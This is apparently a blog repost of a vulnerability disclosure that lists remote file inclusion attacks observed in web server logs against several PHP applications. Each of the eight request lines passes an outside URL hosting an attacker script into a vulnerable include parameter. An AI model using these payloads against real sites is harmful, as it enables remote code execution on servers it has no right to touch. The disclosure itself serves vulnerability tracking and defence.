Disclosure: Multiple Software Remote File Inclusion

[This was originally disclosed on the VIM mail list. VulnDB IDs 90794, 90795, 90796. This was the result of watching Apache logs on attrition.org and observing a wide variety of RFI attacks. I started comparing some of the scripts being attempted with OSVDB and noticed some were not found. That means these were essentially 0days being exploited in the wild.]

Quick searches didn’t find these in OSVDB. I haven’t had time to check the
other VDBs.

/contenido/external/frontend/news.php?cfg[path][includes]=http://www.jef.at/vn

/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.pusanfood.com/bbs//skin/zero_vote//data/res.txt??

/claroline/tracking/userLog.php?rootSys=http://www.free-ddl.com/siteadmin/test.txt%3f%3f%3f

/admin/cron_pop.php?adm_path=http://www.smagz.com/bo.do%3f%3f

/class/class.dashboard_lms.php?where_framework=http://www.randdesign.de/ppoint/include/main.txt??

/modules/TotalCalendar/validcode.php?inc_dir=http://www.geocities.com/injitinjitsemut/cmd1.txt??

/classified_right.php?language_dir=http://www.gracesalesco.com/gracesalescocalendar//tools/test.txt??

/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.unescoulsan.org/bbs//data/safe1.txt???

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s